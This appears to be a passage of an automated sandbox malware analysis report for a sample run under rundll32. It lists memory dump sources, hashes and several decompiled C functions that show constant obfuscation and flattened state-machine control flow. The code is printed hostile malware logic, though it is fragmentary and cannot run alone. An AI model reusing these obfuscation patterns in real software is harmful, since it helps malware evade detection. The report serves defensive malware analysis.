                                                                      0x020015da
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;/$YQ$mP
                                                                      • API String ID: 0-3666080072
                                                                      • Opcode ID: 47880b2951c1e1c441204921e8a5573947b7b5d1dd38183dfbb91e3983d3d2ca
                                                                      • Instruction ID: b37b491326d180595c0dc4bee9dd9c2d12feb666b29a509fbb0395fcaab0effc
                                                                      • Opcode Fuzzy Hash: 47880b2951c1e1c441204921e8a5573947b7b5d1dd38183dfbb91e3983d3d2ca
                                                                      • Instruction Fuzzy Hash: 8F7121B11083419BE398CF65C98981FFBE1BBD4758F044A1DF29A562A0D3B6CA08CB47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002408CF, Relevance: 3.9, Strings: 3, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;/$YQ$mP
                                                                      • API String ID: 0-3666080072
                                                                      • Opcode ID: a4894dc86a31309ad7004ee06dbd5a022662d05678d9d1ed36526e4b0c62e3ff
                                                                      • Instruction ID: b325284e45d21ca3d456e56db64d22a238a615128923031b1a632804fb336c2c
                                                                      • Opcode Fuzzy Hash: a4894dc86a31309ad7004ee06dbd5a022662d05678d9d1ed36526e4b0c62e3ff
                                                                      • Instruction Fuzzy Hash: 607120B21193419BD368CF61C98981FFBE2BBC4758F104A1DF29696260D3B5CA58CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFC145, Relevance: 3.9, Strings: 3, Instructions: 146COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E01FFC145(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _v72;
				intOrPtr _v76;
				void* _t158;
				void* _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				intOrPtr* _t187;
				signed int _t188;
				intOrPtr* _t189;
				void* _t190;

				_v76 = 0x4e59b3;
				asm("stosd");
				_t162 = __ecx;
				_t164 = 0x15;
				asm("stosd");
				_t188 = 9;
				asm("stosd");
				_v12 = 0xc9c5;
				_t187 = 0x2011084;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 * 0x7d;
				_v12 = _v12 * 0x52;
				_v12 = _v12 ^ 0x0003e898;
				_v8 = 0x326b;
				_v8 = _v8 ^ 0x4a0ebab0;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0008366f;
				_v40 = 0x35fc;
				_v40 = _v40 | 0x4fdc2f8a;
				_v40 = _v40 ^ 0x4fdc2023;
				_v48 = 0xbcdb;
				_v48 = _v48 + 0x5d48;
				_v48 = _v48 ^ 0x00014504;
				_v20 = 0xc333;
				_v20 = _v20 << 6;
				_v20 = _v20 + 0xab7c;
				_v20 = _v20 ^ 0x90b5416b;
				_v20 = _v20 ^ 0x90846b09;
				_v44 = 0xaf61;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x0000016e;
				_v32 = 0xeeb1;
				_v32 = _v32 / _t164;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x0000131e;
				_v56 = 0x101;
				_v56 = _v56 << 7;
				_v56 = _v56 ^ 0x0000810a;
				_v24 = 0x5cc;
				_v24 = _v24 << 0xb;
				_t165 = 0x68;
				_v24 = _v24 * 0x53;
				_v24 = _v24 / _t188;
				_v24 = _v24 ^ 0x01abf608;
				_v36 = 0x9340;
				_v36 = _v36 << 4;
				_v36 = _v36 * 0x3d;
				_v36 = _v36 ^ 0x02311cdc;
				_v52 = 0xb9f4;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x0b9f20c2;
				_v28 = 0x28eb;
				_v28 = _v28 << 0xb;
				_v28 = _v28 << 5;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x051d1262;
				_v60 = 0xd87b;
				_v60 = _v60 / _t165;
				_v60 = _v60 ^ 0x00004114;
				_v16 = 0x63a3;
				_v16 = _v16 ^ 0x0cdbf93f;
				_t166 = 0x44;
				_v16 = _v16 / _t166;
				_v16 = _v16 / _t188;
				_v16 = _v16 ^ 0x000560e1;
				_t189 =  *0x2011084;
				while(_t189 != 0) {
					if( *((intOrPtr*)(_t189 + 8)) == 0) {
						L4:
						 *_t187 =  *_t189;
						_t158 = E01FFDE81(_v28, _t189, _v60);
					} else {
						_t158 = E0200C631(_v12, _t162,  *((intOrPtr*)(_t189 + 0x28)), _v8, _v40);
						_t190 = _t190 + 0xc;
						if(_t158 != _v16) {
							_t187 = _t189;
						} else {
							 *((intOrPtr*)(_t189 + 0x18))( *((intOrPtr*)(_t189 + 8)), 0, 0);
							E0200A8BF(_v48, _v20, _v44, _v32,  *((intOrPtr*)(_t189 + 8)));
							E01FFF1ED(_v56, _v24, _v36, _v52,  *((intOrPtr*)(_t189 + 0x28)));
							_t190 = _t190 + 0x18;
							goto L4;
						}
					}
					_t189 =  *_t187;
				}
				return _t158;
			}




























                                                                      0x01ffc14b
                                                                      0x01ffc15c
                                                                      0x01ffc15d
                                                                      0x01ffc161
                                                                      0x01ffc164
                                                                      0x01ffc165
                                                                      0x01ffc168
                                                                      0x01ffc169
                                                                      0x01ffc170
                                                                      0x01ffc175
                                                                      0x01ffc17d
                                                                      0x01ffc184
                                                                      0x01ffc187
                                                                      0x01ffc18e
                                                                      0x01ffc195
                                                                      0x01ffc1a0
                                                                      0x01ffc1a3
                                                                      0x01ffc1a7
                                                                      0x01ffc1ae
                                                                      0x01ffc1b5
                                                                      0x01ffc1bc
                                                                      0x01ffc1c3
                                                                      0x01ffc1ca
                                                                      0x01ffc1d1
                                                                      0x01ffc1d8
                                                                      0x01ffc1df
                                                                      0x01ffc1e3
                                                                      0x01ffc1ea
                                                                      0x01ffc1f1
                                                                      0x01ffc1f8
                                                                      0x01ffc1ff
                                                                      0x01ffc203
                                                                      0x01ffc20a
                                                                      0x01ffc218
                                                                      0x01ffc21b
                                                                      0x01ffc21f
                                                                      0x01ffc226
                                                                      0x01ffc22d
                                                                      0x01ffc231
                                                                      0x01ffc238
                                                                      0x01ffc23f
                                                                      0x01ffc247
                                                                      0x01ffc248
                                                                      0x01ffc252
                                                                      0x01ffc255
                                                                      0x01ffc25c
                                                                      0x01ffc263
                                                                      0x01ffc26b
                                                                      0x01ffc26e
                                                                      0x01ffc275
                                                                      0x01ffc27c
                                                                      0x01ffc280
                                                                      0x01ffc287
                                                                      0x01ffc28e
                                                                      0x01ffc292
                                                                      0x01ffc296
                                                                      0x01ffc29a
                                                                      0x01ffc2a1
                                                                      0x01ffc2ad
                                                                      0x01ffc2b0
                                                                      0x01ffc2b9
                                                                      0x01ffc2c0
                                                                      0x01ffc2cc
                                                                      0x01ffc2d1
                                                                      0x01ffc2d9
                                                                      0x01ffc2dc
                                                                      0x01ffc2e3
                                                                      0x01ffc355
                                                                      0x01ffc2ef
                                                                      0x01ffc341
                                                                      0x01ffc34b
                                                                      0x01ffc34d
                                                                      0x01ffc2f1
                                                                      0x01ffc2ff
                                                                      0x01ffc304
                                                                      0x01ffc30a
                                                                      0x01ffc360
                                                                      0x01ffc30c
                                                                      0x01ffc313
                                                                      0x01ffc325
                                                                      0x01ffc339
                                                                      0x01ffc33e
                                                                      0x00000000
                                                                      0x01ffc33e
                                                                      0x01ffc30a
                                                                      0x01ffc353
                                                                      0x01ffc353
                                                                      0x01ffc35f

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H]$k2$(
                                                                      • API String ID: 0-1078215326
                                                                      • Opcode ID: e5bf22525b87c84787ab1fe5a4eee87b6e3f636bafc8a5aa866c42992b4ec353
                                                                      • Instruction ID: 4152ff6d11c21e6089e889e64b474cd01f456350407b1abce95a00221204ce73
                                                                      • Opcode Fuzzy Hash: e5bf22525b87c84787ab1fe5a4eee87b6e3f636bafc8a5aa866c42992b4ec353
                                                                      • Instruction Fuzzy Hash: 04611F71D00209EBEF09CFA5C9899DEFBB2FF48314F208059D511B62A0C3B95A49CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023B6B9, Relevance: 3.9, Strings: 3, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H]$k2$(
                                                                      • API String ID: 0-1078215326
                                                                      • Opcode ID: 417b0d0813bbd395ec3401c326ec1af0fcf2898957f5341b52308ebd17ef56fd
                                                                      • Instruction ID: 2b22431085bc2340c3dfef24cc19526d02e41de9c9e9f4383d41a177b116af6e
                                                                      • Opcode Fuzzy Hash: 417b0d0813bbd395ec3401c326ec1af0fcf2898957f5341b52308ebd17ef56fd
                                                                      • Instruction Fuzzy Hash: C36111B1D01209EBDF09CFA5D98A5DEFBB2FF48318F208059D511B62A0C3B85A49CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FFF5E0, Relevance: 3.9, Strings: 3, Instructions: 135COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E01FFF5E0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t108;
				void* _t120;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				void* _t131;
				void* _t148;
				signed int* _t151;

				_push(_a16);
				_t147 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t108);
				_v100 = 0xbd2b;
				_t151 =  &(( &_v108)[6]);
				_v100 = _v100 + 0xc830;
				_v100 = _v100 ^ 0xf25ece92;
				_t148 = 0;
				_v100 = _v100 ^ 0x67839fcf;
				_t131 = 0x1bb8a706;
				_v100 = _v100 ^ 0x95dca476;
				_v104 = 0xe5f5;
				_v104 = _v104 ^ 0x3a2ce663;
				_v104 = _v104 + 0x2b7;
				_v104 = _v104 + 0xfffff7b7;
				_v104 = _v104 ^ 0x3a2bd932;
				_v108 = 0xdd91;
				_t126 = 0x78;
				_v108 = _v108 / _t126;
				_v108 = _v108 << 3;
				_v108 = _v108 | 0x72d1b8ea;
				_v108 = _v108 ^ 0x72d1fa04;
				_v76 = 0xd4ee;
				_t127 = 0x31;
				_v76 = _v76 * 0x6a;
				_v76 = _v76 ^ 0x0058075c;
				_v84 = 0x2487;
				_v84 = _v84 << 0xd;
				_v84 = _v84 / _t127;
				_v84 = _v84 ^ 0x0017b008;
				_v96 = 0x31db;
				_v96 = _v96 ^ 0x255ec927;
				_v96 = _v96 + 0x2f88;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x000038c6;
				_v72 = 0x5e58;
				_v72 = _v72 + 0xffff066f;
				_v72 = _v72 ^ 0xffff345d;
				_v80 = 0x2e99;
				_v80 = _v80 | 0xfff3fbee;
				_v80 = _v80 ^ 0xfff3b346;
				_v88 = 0x63de;
				_t128 = 0x6e;
				_v88 = _v88 / _t128;
				_v88 = _v88 >> 7;
				_v88 = _v88 + 0x451f;
				_v88 = _v88 ^ 0x0000098b;
				_v92 = 0x3ecb;
				_v92 = _v92 * 0x6a;
				_v92 = _v92 * 0x70;
				_v92 = _v92 * 0x17;
				_v92 = _v92 ^ 0x05a0db37;
				do {
					while(_t131 != 0x2106865) {
						if(_t131 == 0x1bb8a706) {
							_t131 = 0x222f3472;
							continue;
						} else {
							if(_t131 == 0x222f3472) {
								E01FFFEE3(_a12,  &_v68, _v100, _v104, _v108, _v76);
								_t151 =  &(_t151[4]);
								_t131 = 0x2106865;
								continue;
							} else {
								_t157 = _t131 - 0x2cd0632e;
								if(_t131 != 0x2cd0632e) {
									goto L12;
								} else {
									E01FFF914(_v72, _v80, _t157, _v88, _t147 + 4, _v92,  &_v68);
									_t148 =  !=  ? 1 : _t148;
								}
							}
						}
						L6:
						return _t148;
					}
					_t120 = E01FFBAA2( &_v68, _v84, _v96, _t147);
					_t151 =  &(_t151[2]);
					__eflags = _t120;
					if(__eflags == 0) {
						_t131 = 0x9b007f1;
						goto L12;
					} else {
						_t131 = 0x2cd0632e;
						continue;
					}
					goto L6;
					L12:
					__eflags = _t131 - 0x9b007f1;
				} while (__eflags != 0);
				goto L6;
			}






















                                                                      0x01fff5e7
                                                                      0x01fff5ee
                                                                      0x01fff5f5
                                                                      0x01fff5fc
                                                                      0x01fff5fd
                                                                      0x01fff604
                                                                      0x01fff605
                                                                      0x01fff606
                                                                      0x01fff60b
                                                                      0x01fff613
                                                                      0x01fff616
                                                                      0x01fff620
                                                                      0x01fff628
                                                                      0x01fff62a
                                                                      0x01fff632
                                                                      0x01fff637
                                                                      0x01fff644
                                                                      0x01fff64c
                                                                      0x01fff654
                                                                      0x01fff65c
                                                                      0x01fff664
                                                                      0x01fff66c
                                                                      0x01fff67a
                                                                      0x01fff67f
                                                                      0x01fff685
                                                                      0x01fff68a
                                                                      0x01fff692
                                                                      0x01fff69a
                                                                      0x01fff6a7
                                                                      0x01fff6aa
                                                                      0x01fff6ae
                                                                      0x01fff6b6
                                                                      0x01fff6be
                                                                      0x01fff6cb
                                                                      0x01fff6cf
                                                                      0x01fff6d7
                                                                      0x01fff6df
                                                                      0x01fff6e7
                                                                      0x01fff6ef
                                                                      0x01fff6f4
                                                                      0x01fff6fc
                                                                      0x01fff704
                                                                      0x01fff70c
                                                                      0x01fff714
                                                                      0x01fff71c
                                                                      0x01fff724
                                                                      0x01fff72c
                                                                      0x01fff738
                                                                      0x01fff740
                                                                      0x01fff744
                                                                      0x01fff749
                                                                      0x01fff751
                                                                      0x01fff759
                                                                      0x01fff766
                                                                      0x01fff76f
                                                                      0x01fff778
                                                                      0x01fff77c
                                                                      0x01fff784
                                                                      0x01fff784
                                                                      0x01fff792
                                                                      0x01fff7fd
                                                                      0x00000000
                                                                      0x01fff794
                                                                      0x01fff796
                                                                      0x01fff7ee
                                                                      0x01fff7f3
                                                                      0x01fff7f6
                                                                      0x00000000
                                                                      0x01fff798
                                                                      0x01fff798
                                                                      0x01fff79a
                                                                      0x00000000
                                                                      0x01fff7a0
                                                                      0x01fff7b9
                                                                      0x01fff7c6
                                                                      0x01fff7c6
                                                                      0x01fff79a
                                                                      0x01fff796
                                                                      0x01fff7ca
                                                                      0x01fff7d2
                                                                      0x01fff7d2
                                                                      0x01fff80e
                                                                      0x01fff813
                                                                      0x01fff816
                                                                      0x01fff818
                                                                      0x01fff821
                                                                      0x00000000
                                                                      0x01fff81a
                                                                      0x01fff81a
                                                                      0x00000000
                                                                      0x01fff81a
                                                                      0x00000000
                                                                      0x01fff826
                                                                      0x01fff826
                                                                      0x01fff826
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X^$c,:$r4/"
                                                                      • API String ID: 0-1154924512
                                                                      • Opcode ID: ee755c4278271f96210a97fe9531c3849dfc2dbf006185a258316c46e1c648fd
                                                                      • Instruction ID: 077ad54a0e454bc6c4fbb9375f81396d9bc4cac7e04e426601fbeeab4066a08f
                                                                      • Opcode Fuzzy Hash: ee755c4278271f96210a97fe9531c3849dfc2dbf006185a258316c46e1c648fd
                                                                      • Instruction Fuzzy Hash: D8515772508382DBD754CE24C98581BFBE5FFC8708F504A1DF5C6A62A0D7B68A09CB97
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023EB54, Relevance: 3.9, Strings: 3, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X^$c,:$r4/"
                                                                      • API String ID: 0-1154924512
                                                                      • Opcode ID: b0f91960b31b42c11a33f64cea1bf467d0de1a54f0e0d13f0772bb0d76042489
                                                                      • Instruction ID: 68cf62b81439963f641c6bca7bb27c81cfe2e588007d2f7d6506a7bca8626f1c
                                                                      • Opcode Fuzzy Hash: b0f91960b31b42c11a33f64cea1bf467d0de1a54f0e0d13f0772bb0d76042489
                                                                      • Instruction Fuzzy Hash: BE5168B21083829BD758CF20C98681FFBE5FBC8708F405A1DF4C5A62A0D7758A19CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF3FAF, Relevance: 3.9, Strings: 3, Instructions: 118COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E01FF3FAF() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _t97;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				intOrPtr _t115;
				signed int* _t117;

				_t117 =  &_v356;
				_v328 = 0x3138;
				_t115 = 0;
				_t97 = 0x33d529cc;
				_v324 = 0;
				_v344 = 0x9123;
				_v344 = _v344 | 0x5a808bd5;
				_v344 = _v344 + 0xeb06;
				_v344 = _v344 ^ 0x5a818485;
				_v340 = 0xc804;
				_t111 = 0x44;
				_v340 = _v340 * 0x5f;
				_v340 = _v340 | 0x7b6fdd9e;
				_v340 = _v340 ^ 0x7b6fb88e;
				_v348 = 0x9154;
				_v348 = _v348 / _t111;
				_v348 = _v348 + 0x2621;
				_v348 = _v348 >> 7;
				_v348 = _v348 ^ 0x00001b68;
				_v336 = 0x690d;
				_v336 = _v336 >> 0xa;
				_v336 = _v336 ^ 0x0000404b;
				_v356 = 0x945a;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 << 9;
				_t112 = 0x5d;
				_v356 = _v356 / _t112;
				_v356 = _v356 ^ 0x00005b50;
				_v332 = 0xb02a;
				_t113 = 0x60;
				_v332 = _v332 / _t113;
				_v332 = _v332 ^ 0x000056d0;
				_v352 = 0x389b;
				_v352 = _v352 * 0x54;
				_v352 = _v352 << 0xf;
				_v352 = _v352 + 0xffffdcc7;
				_v352 = _v352 ^ 0x496daad3;
				do {
					while(_t97 != 0xe09bda3) {
						if(_t97 == 0x15edbb33) {
							_t97 = 0x37fd0e9f;
							_t115 = _t115 + _v276 * 0x64;
							continue;
						} else {
							if(_t97 == 0x1cbb7e54) {
								_t97 = 0x2caaacac;
								_t115 = _t115 + (_v2 & 0x000000ff) * 0x186a0;
								continue;
							} else {
								if(_t97 == 0x213f0da0) {
									E01FFB9F2( &_v320, _v356, _v332, _v352);
									_t97 = 0x1cbb7e54;
									continue;
								} else {
									if(_t97 == 0x2caaacac) {
										_t97 = 0x15edbb33;
										_t115 = _t115 + _v280 * 0x3e8;
										continue;
									} else {
										if(_t97 == 0x33d529cc) {
											_t97 = 0xe09bda3;
											continue;
										} else {
											if(_t97 != 0x37fd0e9f) {
												goto L16;
											} else {
												_t115 = _t115 + (_v320 & 0x0000ffff);
											}
										}
									}
								}
							}
						}
						L9:
						return _t115;
					}
					_v284 = 0x11c;
					E0200279F(_v344, _v340, _v348, _v336,  &_v284);
					_t117 =  &(_t117[3]);
					_t97 = 0x213f0da0;
					L16:
				} while (_t97 != 0x23841290);
				goto L9;
			}























                                                                      0x01ff3faf
                                                                      0x01ff3fb5
                                                                      0x01ff3fc2
                                                                      0x01ff3fc4
                                                                      0x01ff3fc9
                                                                      0x01ff3fd2
                                                                      0x01ff3fdf
                                                                      0x01ff3fe7
                                                                      0x01ff3fef
                                                                      0x01ff3ff7
                                                                      0x01ff4007
                                                                      0x01ff400a
                                                                      0x01ff400e
                                                                      0x01ff4016
                                                                      0x01ff401e
                                                                      0x01ff402e
                                                                      0x01ff4032
                                                                      0x01ff403a
                                                                      0x01ff403f
                                                                      0x01ff4047
                                                                      0x01ff404f
                                                                      0x01ff4054
                                                                      0x01ff405c
                                                                      0x01ff4064
                                                                      0x01ff4069
                                                                      0x01ff4072
                                                                      0x01ff4077
                                                                      0x01ff407d
                                                                      0x01ff4085
                                                                      0x01ff4091
                                                                      0x01ff4099
                                                                      0x01ff409d
                                                                      0x01ff40a5
                                                                      0x01ff40b2
                                                                      0x01ff40b6
                                                                      0x01ff40bb
                                                                      0x01ff40c3
                                                                      0x01ff40cb
                                                                      0x01ff40cb
                                                                      0x01ff40d5
                                                                      0x01ff4166
                                                                      0x01ff4168
                                                                      0x00000000
                                                                      0x01ff40db
                                                                      0x01ff40e1
                                                                      0x01ff414f
                                                                      0x01ff415a
                                                                      0x00000000
                                                                      0x01ff40e3
                                                                      0x01ff40e9
                                                                      0x01ff4139
                                                                      0x01ff4140
                                                                      0x00000000
                                                                      0x01ff40eb
                                                                      0x01ff40f1
                                                                      0x01ff4123
                                                                      0x01ff4125
                                                                      0x00000000
                                                                      0x01ff40f3
                                                                      0x01ff40f9
                                                                      0x01ff4117
                                                                      0x00000000
                                                                      0x01ff40fb
                                                                      0x01ff40fd
                                                                      0x00000000
                                                                      0x01ff4103
                                                                      0x01ff4108
                                                                      0x01ff4108
                                                                      0x01ff40fd
                                                                      0x01ff40f9
                                                                      0x01ff40f1
                                                                      0x01ff40e9
                                                                      0x01ff40e1
                                                                      0x01ff410b
                                                                      0x01ff4116
                                                                      0x01ff4116
                                                                      0x01ff4173
                                                                      0x01ff418c
                                                                      0x01ff4191
                                                                      0x01ff4194
                                                                      0x01ff4199
                                                                      0x01ff4199
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !&$K@$P[
                                                                      • API String ID: 0-2917137494
                                                                      • Opcode ID: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
                                                                      • Instruction ID: e7c032a21e9e1502ed53dc11de5d2ee6c0ff148a2ec2ca5958319e04091a8a14
                                                                      • Opcode Fuzzy Hash: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
                                                                      • Instruction Fuzzy Hash: 7B417C71608305CBD718CE29D48502FBBE5AFD4754F14491EF695A62A0D3B68A0A8F93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00233523, Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !&$K@$P[
                                                                      • API String ID: 0-2917137494
                                                                      • Opcode ID: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
                                                                      • Instruction ID: 9a442d3e769083969182367857642a03c16f001163f0853e061dcb92f61664b8
                                                                      • Opcode Fuzzy Hash: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
                                                                      • Instruction Fuzzy Hash: 98419BB02183429FD718CE25D48602FFBE5ABC4758F14491EF496AA2A0D375CB1E8F97
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF35FC, Relevance: 3.9, Strings: 3, Instructions: 101COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E01FF35FC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				void* _t106;
				signed int _t118;
				signed int _t119;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t106);
				_v24 = 0x9798;
				_v24 = _v24 + 0xffffbd22;
				_v24 = _v24 + 0x641e;
				_v24 = _v24 ^ 0x0000a020;
				_v36 = 0x61df;
				_t118 = 0x59;
				_v36 = _v36 * 0x26;
				_v36 = _v36 ^ 0x000edcfe;
				_v32 = 0xcd5;
				_v32 = _v32 ^ 0xf6eb11a6;
				_v32 = _v32 ^ 0xf6eb5e3d;
				_v28 = 0x5819;
				_v28 = _v28 | 0xf42f747a;
				_v28 = _v28 ^ 0xf42f4692;
				_v48 = 0xdcf0;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x00002f29;
				_v44 = 0x97e5;
				_t119 = 0x6a;
				_v44 = _v44 / _t118;
				_v44 = _v44 ^ 0x00000ed0;
				_v12 = 0xa421;
				_v12 = _v12 | 0x274c75f9;
				_v12 = _v12 + 0x5ba7;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x3546b17c;
				_v40 = 0x78dd;
				_v40 = _v40 >> 0xd;
				_v40 = _v40 ^ 0x00007b97;
				_v8 = 0xdcde;
				_v8 = _v8 | 0x90b63865;
				_v8 = _v8 + 0xeb12;
				_push(0x1ff13dc);
				_v8 = _v8 * 0x27;
				_v8 = _v8 ^ 0x0c047073;
				_v20 = 0xf013;
				_v20 = _v20 ^ 0x6a2eccf0;
				_v20 = _v20 << 7;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x002e686d;
				_v52 = 0xca9e;
				_v52 = _v52 + 0xffffaa95;
				_v52 = _v52 ^ 0x00003a71;
				_v16 = 0x1985;
				_v16 = _v16 ^ 0x7d67dffe;
				_v16 = _v16 | 0x92ef9f7f;
				_v16 = _v16 / _t119;
				_v16 = _v16 ^ 0x026a2075;
				_push(_v28);
				_push(_v32);
				E01FFA4D7(_v16, _v44, _v12, _v40, _v8, E01FF5DFC(_v24, _v36, _v16), _a20, _a12, __ecx);
				return E02000D6D(_v20, _v52, _v16, _t114);
			}


















                                                                      0x01ff3604
                                                                      0x01ff3609
                                                                      0x01ff360c
                                                                      0x01ff360f
                                                                      0x01ff3612
                                                                      0x01ff3615
                                                                      0x01ff3616
                                                                      0x01ff3617
                                                                      0x01ff361c
                                                                      0x01ff3625
                                                                      0x01ff362c
                                                                      0x01ff3633
                                                                      0x01ff363a
                                                                      0x01ff3647
                                                                      0x01ff364a
                                                                      0x01ff364d
                                                                      0x01ff3654
                                                                      0x01ff365b
                                                                      0x01ff3662
                                                                      0x01ff3669
                                                                      0x01ff3670
                                                                      0x01ff3677
                                                                      0x01ff367e
                                                                      0x01ff3685
                                                                      0x01ff3689
                                                                      0x01ff3690
                                                                      0x01ff369c
                                                                      0x01ff369d
                                                                      0x01ff36a2
                                                                      0x01ff36a9
                                                                      0x01ff36b0
                                                                      0x01ff36b7
